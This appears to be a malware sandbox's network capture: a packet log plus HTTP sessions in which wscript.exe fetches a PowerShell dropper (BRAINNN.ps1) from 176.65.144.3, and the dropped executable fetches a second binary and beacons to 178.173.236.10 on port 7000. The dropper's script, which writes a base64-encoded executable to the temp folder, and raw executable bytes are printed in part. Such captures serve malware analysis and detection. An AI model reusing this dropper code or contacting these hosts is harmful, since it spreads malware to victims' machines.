                                                  Mar 19, 2025 14:19:28.530303001 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530320883 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530339003 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530355930 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530385971 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.530420065 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.530615091 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530642986 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530658960 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530658960 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.530680895 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530703068 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.530740023 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.530782938 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.531539917 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.531579971 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.531598091 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.531618118 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.531635046 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.531639099 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.531658888 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.532488108 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.532505989 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.532522917 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.532537937 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.532542944 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.532555103 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.532593966 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.532608032 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.533356905 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.533375978 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.533394098 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.533493996 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.655498028 CET8049717176.65.144.3192.168.2.4
                                                  Mar 19, 2025 14:19:28.704257011 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:28.707875967 CET4971780192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:32.253295898 CET4971380192.168.2.4176.65.144.3
                                                  Mar 19, 2025 14:19:33.312024117 CET497227000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:33.316828012 CET700049722178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:33.317008972 CET497227000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:33.463835001 CET497227000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:33.468642950 CET700049722178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:41.711554050 CET700049722178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:41.711642027 CET497227000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:41.735848904 CET497227000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:41.737425089 CET497237000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:41.740510941 CET700049722178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:41.742130995 CET700049723178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:41.742213964 CET497237000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:41.762901068 CET497237000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:41.767604113 CET700049723178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:50.129513979 CET700049723178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:50.129662037 CET497237000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:52.063707113 CET497237000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:52.064685106 CET497247000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:52.068561077 CET700049723178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:52.069327116 CET700049724178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:19:52.069431067 CET497247000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:52.089112043 CET497247000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:19:52.093873978 CET700049724178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:00.443008900 CET700049724178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:00.443176031 CET497247000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:01.391622066 CET497247000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:01.392560005 CET497277000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:01.397459030 CET700049724178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:01.397604942 CET700049727178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:01.397691965 CET497277000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:01.419943094 CET497277000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:01.428412914 CET700049727178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:09.786246061 CET700049727178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:09.786473989 CET497277000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:12.126060009 CET497277000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:12.127167940 CET497297000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:12.130810976 CET700049727178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:12.131828070 CET700049729178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:12.131927013 CET497297000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:12.149306059 CET497297000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:12.154652119 CET700049729178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:20.504683971 CET700049729178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:20.504801035 CET497297000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:21.532205105 CET497297000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:21.533552885 CET497307000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:21.536917925 CET700049729178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:21.538238049 CET700049730178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:21.538356066 CET497307000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:21.561286926 CET497307000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:21.565944910 CET700049730178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:29.911429882 CET700049730178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:29.911534071 CET497307000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:30.532613039 CET497307000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:30.534936905 CET497317000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:30.538249969 CET700049730178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:30.541331053 CET700049731178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:30.541440964 CET497317000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:30.565584898 CET497317000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:30.571265936 CET700049731178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:38.927925110 CET700049731178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:38.927998066 CET497317000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:41.923176050 CET497317000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:41.927921057 CET700049731178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:41.930367947 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:41.935154915 CET700049732178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:41.935250998 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:41.998166084 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:42.003151894 CET700049732178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:42.005148888 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:42.010277987 CET700049732178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:50.335509062 CET700049732178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:50.341777086 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:52.250852108 CET497327000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:52.253098011 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:52.256753922 CET700049732178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:52.260184050 CET700049733178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:52.260277033 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:52.288264036 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:52.292944908 CET700049733178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:20:58.204325914 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:20:58.209227085 CET700049733178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:00.943392038 CET700049733178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:00.943491936 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:02.939613104 CET497337000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:02.940063953 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:02.944312096 CET700049733178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:02.944659948 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:02.944971085 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:03.045819044 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:03.051712990 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:08.813369036 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:08.818666935 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:11.157130957 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:11.162673950 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:11.334353924 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:11.337904930 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:13.625695944 CET497347000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:13.627762079 CET497357000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:13.630439997 CET700049734178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:13.632486105 CET700049735178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:13.632540941 CET497357000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:13.671087027 CET497357000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:13.675932884 CET700049735178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:17.189543009 CET497357000192.168.2.4178.173.236.10
                                                  Mar 19, 2025 14:21:17.194400072 CET700049735178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:22.006784916 CET700049735178.173.236.10192.168.2.4
                                                  Mar 19, 2025 14:21:22.006845951 CET497357000192.168.2.4178.173.236.10
                                                  • 176.65.144.3
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.449713176.65.144.3807740C:\Windows\System32\wscript.exe
                                                  TimestampBytes transferredDirectionData
                                                  Mar 19, 2025 14:19:21.508008003 CET331OUTGET /dev/BRAINNN.ps1 HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: en-ch
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: 176.65.144.3
                                                  Connection: Keep-Alive
                                                  Mar 19, 2025 14:19:22.249393940 CET1236INHTTP/1.1 200 OK
                                                  Date: Wed, 19 Mar 2025 13:19:22 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Thu, 13 Mar 2025 23:12:16 GMT
                                                  ETag: "e362-6304173f3cec3"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 58210
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Data Raw: 24 51 41 41 44 43 43 44 47 44 48 46 54 52 52 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 4a 58 43 4a 4b 58 43 4a 48 4b 4a 48 58 43 4a 48 4b 58 43 58 43 4a 48 4b 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 51 41 41 44 43 43 44 47 44 48 46 54 52 52 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 46 41 4e 53 4a 54 75 41 41 41 41 [TRUNCATED]
                                                  Data Ascii: $QAADCCDGDHFTRR=[IO.Path]::Combine($env:TEMP,"JXCJKXCJHKJHXCJHKXCXCJHK.exe")[IO.File]::WriteAllBytes($QAADCCDGDHFTRR,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFANSJTuAAAAAAAAAAAOAAIgALATAAAH4AAAAoAAAAAAAACuAAAABAAAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAAAgAQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACxGAABPAAAAAMAAALoFAAAAAAAAAAAAAAAAAAAAAAAAAAABAAwAAADQRQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAACAAAAAAAAAAAAAAAAEAAAEgAAAAAAAAAAAAAADNZWiY6XE8I2B8AAAAgAAAAIAAAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAAER7AAAAQAAAAHwAAAAkAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAC6BQAAAMAAAAAGAAAAoAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAADgAAAAAgAAAKYAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAAAEAAAIAAACoAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Mar 19, 2025 14:19:22.249485016 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Mar 19, 2025 14:19:22.249521017 CET1236INData Raw: 6b 4e 68 4b 6a 54 6c 55 48 69 57 45 49 44 34 7a 63 4c 73 32 30 33 6b 44 6f 77 34 4d 4e 66 76 72 79 4f 73 35 50 70 6e 70 41 77 51 6a 57 6d 46 49 59 71 6b 7a 6b 59 53 6d 32 4b 76 50 51 61 38 43 63 61 4b 55 61 58 4b 73 52 35 44 55 54 6e 56 7a 6b 58
                                                  Data Ascii: kNhKjTlUHiWEID4zcLs203kDow4MNfvryOs5PpnpAwQjWmFIYqkzkYSm2KvPQa8CcaKUaXKsR5DUTnVzkX3hWBao5dzhVkz1C2qtw7zMZeL+7lPdkn9qeM4/LM4gMrtC6SxQFyjzASGK8MfkHMud0P1HA6YydnZhGlPnA5dkmaec8ovl56B6hNFr1hMDF5Q32nFCrRmJ3NceCRvcrOMqmGS2fufvvfC60Tr3smhWDCXc2zJ1eYD
                                                  Mar 19, 2025 14:19:22.249556065 CET1236INData Raw: 33 38 56 4c 78 5a 45 51 2b 6f 62 68 35 59 79 67 6b 55 4b 69 64 53 2b 66 31 38 30 55 43 2b 62 51 4b 45 77 47 4f 4b 36 48 70 45 49 67 56 32 78 4a 47 36 58 70 72 38 37 36 63 6b 61 48 52 4c 37 39 73 34 72 6b 4e 78 45 46 4b 48 71 6d 48 77 54 76 37 45
                                                  Data Ascii: 38VLxZEQ+obh5YygkUKidS+f180UC+bQKEwGOK6HpEIgV2xJG6Xpr876ckaHRL79s4rkNxEFKHqmHwTv7E8IT+7NhdHgVwSqcWvWjmBss+O/JiD7ZoQUuW8KT6c+De9waYuSMC70q4EeALy0VgyeyMTXNr3kSm3pNaVP3j1DdiE+U8/Br1uYvUdquKKv8v3TTit8znHORjAhENmVzJS+CR1WGgZmfjTb7QbGpa+XaPeWhozs89I
                                                  Mar 19, 2025 14:19:22.249591112 CET1236INData Raw: 46 6d 56 69 34 6f 61 77 54 41 39 4f 47 58 41 53 6b 64 6a 4e 6a 64 2b 5a 7a 38 34 70 68 68 51 69 32 56 31 7a 45 37 61 4a 71 69 44 47 6c 68 68 4b 71 48 67 63 6d 31 43 50 50 6c 64 66 58 46 30 5a 44 73 49 6e 64 43 4f 6a 67 54 4a 69 48 73 4c 46 5a 55
                                                  Data Ascii: FmVi4oawTA9OGXASkdjNjd+Zz84phhQi2V1zE7aJqiDGlhhKqHgcm1CPPldfXF0ZDsIndCOjgTJiHsLFZU4AqUS08Gz1f5NZfOz8VkCoUV3FaVYag5PabMqiqN3lWTDiyTkqJgGPkgMhXhzljitkpKST7TYtjPizhyhRi1QcAL+nG7b25A4ZBzQ8AqCudxJx0H8E/K3jYLb4cWkx8G9zNG/X8DAwX9jLRgnk6aRiqeSYI3NCgxw
                                                  Mar 19, 2025 14:19:22.249628067 CET1236INData Raw: 79 55 4e 76 36 43 38 42 78 4b 78 62 4c 43 51 68 2b 76 57 74 4b 4d 53 65 2f 45 7a 30 33 36 63 71 4a 65 66 51 51 39 5a 4b 51 4e 72 59 47 37 31 4f 4c 76 61 67 67 79 53 48 6f 68 43 45 77 73 51 6c 36 6c 73 57 61 55 37 34 47 62 70 75 6b 77 33 36 56 76
                                                  Data Ascii: yUNv6C8BxKxbLCQh+vWtKMSe/Ez036cqJefQQ9ZKQNrYG71OLvaggySHohCEwsQl6lsWaU74Gbpukw36Vv2LABOyP2NzcFMsZJrzqQN8PHHMjYvSJQD2sG1iB9Vh+RAgIsMSFbjlcQ72KTCWzvCWprRJ5etU5+kKOMHdQSEsXsOfKgupI54isq+IIO/NastyFHxbGe6qU/Q2y1KbNSafpm32JowaTswjypgAGdTeZiL+eLUwXta
                                                  Mar 19, 2025 14:19:22.249663115 CET1236INData Raw: 73 49 30 37 55 6a 38 57 6c 50 39 4d 45 72 53 4c 69 4c 4c 76 74 41 44 62 70 47 4c 53 47 36 48 2f 34 59 4d 31 58 64 47 6a 54 47 76 6c 57 46 35 76 75 38 59 2f 71 6f 6f 74 71 64 74 43 62 34 79 50 69 47 76 4e 6f 71 39 59 79 35 4e 48 2b 49 33 6f 66 36
                                                  Data Ascii: sI07Uj8WlP9MErSLiLLvtADbpGLSG6H/4YM1XdGjTGvlWF5vu8Y/qootqdtCb4yPiGvNoq9Yy5NH+I3of6Lg4bcBKSEbooOO016Am4783smF5ZMz2PtSD2fMJg6XbXs7oaCNPwORq6wStlg0Djm7X8MHPO83Yvpjj6F8d4XthbP9SxZwPy+yXhipDKpVBs1TDu+Bwt+bgl7uFxV93Tdpy63oe85IWwS4GMBGAjeDKm9J2yl+va1
                                                  Mar 19, 2025 14:19:22.249700069 CET1236INData Raw: 33 78 32 42 33 31 33 42 2b 41 59 61 6b 43 58 6e 2b 64 6b 75 2b 4c 70 70 71 66 57 76 6e 5a 63 66 6a 73 6f 44 41 43 31 4f 4e 2b 57 43 76 58 4c 53 48 76 49 41 6f 4c 51 49 39 64 2b 4e 37 4d 79 44 50 2f 57 69 4d 64 6a 79 4a 36 63 66 42 61 70 50 2b 76
                                                  Data Ascii: 3x2B313B+AYakCXn+dku+LppqfWvnZcfjsoDAC1ON+WCvXLSHvIAoLQI9d+N7MyDP/WiMdjyJ6cfBapP+v/OG6rjy8+7Ssj+aBbxE4lfeeMKaWW/umPhD9jI2yw9VN7S0gO8AHC9So9ChTvOXXKAswX7KGPquaoRr8b2P0qY3kp6axg/S1RZavcD/0JY5IIWWzRj7knrr3/sTf6MyBpsgOXIVzKAvGs+jw8F/W2jBqHVQPIMfn/
                                                  Mar 19, 2025 14:19:22.249733925 CET1236INData Raw: 44 67 68 54 46 57 79 53 77 56 6f 7a 59 4a 56 73 42 71 45 74 6f 7a 62 75 6d 4e 48 38 6d 68 72 7a 6c 49 71 61 68 6c 77 74 44 47 73 43 51 59 56 43 56 32 39 32 71 39 62 44 2f 4d 4d 2b 6c 50 54 56 34 6b 37 43 74 2f 49 70 4b 34 2f 31 71 78 4f 66 72 31
                                                  Data Ascii: DghTFWySwVozYJVsBqEtozbumNH8mhrzlIqahlwtDGsCQYVCV292q9bD/MM+lPTV4k7Ct/IpK4/1qxOfr16NeDxJUx9bY1Hmo7tb/LXuue0lvx+FIumhPIPE6pBK/ZMu/lDLjsagNTXFkkOTp+R7HtzfiER+cXHZ5XoZd1fuE4M0EplpSzhc/JPK+Qak/gO3VErlUdh5J0eyAnUMOw1Z5iegUdn4u7r/aqsJ3Zelw+PZro4Qp4D
                                                  Mar 19, 2025 14:19:22.249769926 CET1236INData Raw: 6a 70 35 49 47 43 4d 72 49 50 74 46 36 68 34 2b 79 5a 39 33 37 4e 32 71 4d 6f 61 47 33 50 45 6f 51 4f 32 4e 34 2b 6a 79 57 50 78 70 53 2b 51 52 2b 65 78 4c 30 33 32 2f 4c 58 68 72 70 53 4a 50 4b 56 6a 33 35 38 78 77 79 48 4a 61 59 48 6b 33 78 45
                                                  Data Ascii: jp5IGCMrIPtF6h4+yZ937N2qMoaG3PEoQO2N4+jyWPxpS+QR+exL032/LXhrpSJPKVj358xwyHJaYHk3xEG6a50GH8HgWfBAkkYgRRPPAzE8QQIM0U4/Lk4ZmS/54LSWs7qxxoMfGl5TuDb0tZPzUbEHQy8RioHyrk8IvIqyzDUl62OIKkm9mBG074pZvJY1DnAdUxt7Hm9OyGi3hwyAX/gWwQgLCa/vnDoSev+AHEh39hJ0Wee
                                                  Mar 19, 2025 14:19:22.255508900 CET1236INData Raw: 6d 46 53 4e 35 31 79 58 69 4e 47 6e 38 42 7a 65 50 61 32 6f 63 36 6f 57 78 68 6a 61 2b 56 71 30 57 68 2b 4c 69 77 78 61 49 49 50 7a 52 55 76 33 6d 79 43 55 33 38 56 6e 58 42 53 39 52 2f 63 37 4f 56 54 4f 6a 78 68 32 43 31 54 72 4f 58 39 70 43 58
                                                  Data Ascii: mFSN51yXiNGn8BzePa2oc6oWxhja+Vq0Wh+LiwxaIIPzRUv3myCU38VnXBS9R/c7OVTOjxh2C1TrOX9pCXJ9O96ftLOUVfeqLjALbYP9Hyrz0Nzi4QlJA+BjcFmSpAWzdA96h+vqg69PfUpkE5Ilyrqe/Voen6tkMUJrRw/+6kBuqatWFmi2M3RwOzzKDfo8uhrLOGLTd9G9eJ8pGnLiQrpb65aSJbJ+lIdm4lncFZkKKS4jICW


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449717176.65.144.3805704C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe
                                                  TimestampBytes transferredDirectionData
                                                  Mar 19, 2025 14:19:27.656965971 CET76OUTGET /dev/BRAINN.exe HTTP/1.1
                                                  Host: 176.65.144.3
                                                  Connection: Keep-Alive
                                                  Mar 19, 2025 14:19:28.405307055 CET1236INHTTP/1.1 200 OK
                                                  Date: Wed, 19 Mar 2025 13:19:28 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                  Last-Modified: Wed, 12 Mar 2025 20:43:35 GMT
                                                  ETag: "a200-6302b42599ee1"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 41472
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f6 f1 d1 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 98 00 00 00 08 00 00 00 00 00 00 fe b6 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 b6 00 00 53 00 00 00 00 c0 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELg @ @S H.text `.rsrc@@.reloc@BH[Z(*(*ssss*0~o+*0~o+*0~o+*0~o+*0((+*0(+*0(+*0(+*0-(++++*
                                                  Mar 19, 2025 14:19:28.405323982 CET1236INData Raw: 30 02 00 10 00 00 00 0a 00 00 11 03 12 00 fe 15 02 00 00 1b 06 81 02 00 00 1b 2a 1e 02 28 17 00 00 0a 2a 13 30 01 00 20 00 00 00 0b 00 00 11 7e 19 00 00 0a 8c 03 00 00 1b 2d 0a 28 02 00 00 2b 80 19 00 00 0a 7e 19 00 00 0a 0a 2b 00 06 2a 1e 02 28
                                                  Data Ascii: 0*(*0 ~-(+~+*(*0rpr3preprprprpr-pr_prprp(rp(rprRpr
